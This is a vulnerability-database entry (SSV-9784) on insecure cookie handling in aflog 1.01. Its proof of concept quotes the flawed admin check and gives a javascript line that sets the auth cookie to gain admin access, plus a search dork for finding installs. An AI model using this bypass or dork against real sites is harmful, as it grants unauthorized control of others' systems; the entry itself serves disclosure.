aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies

基本字段

漏洞编号:
SSV-9784
披露/发现时间:
未知
提交时间:
2008-10-24
漏洞等级:
漏洞类别:
Cookie 验证错误
影响组件:
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.25KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies
# url: http://www.aflog.org/download.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
vuln file: /edit_delete.php
vuln code:
15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){
xx: .. ---> :P
33: }
34: } else {
35: echo "<center><b><img src='img/x.png'> ERROR!</b><br>You do not have access to this page. You must be Signed In as
36: an Admin.</center><br>";
37: echo "<center><a href='index.php' class='c'>Home</a> | <a href='login.php?do=form' class='c'>Sign In</a></center>":
38: }
exploit: javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/";
and enters: /edit_delete.php?id=1 --> POST ID!!
---
vuln files:
edit_cat.php
edit_lock.php
edit_form.php
...more?
dork: "powered by aflog"
Hack0wn :D
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1282
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负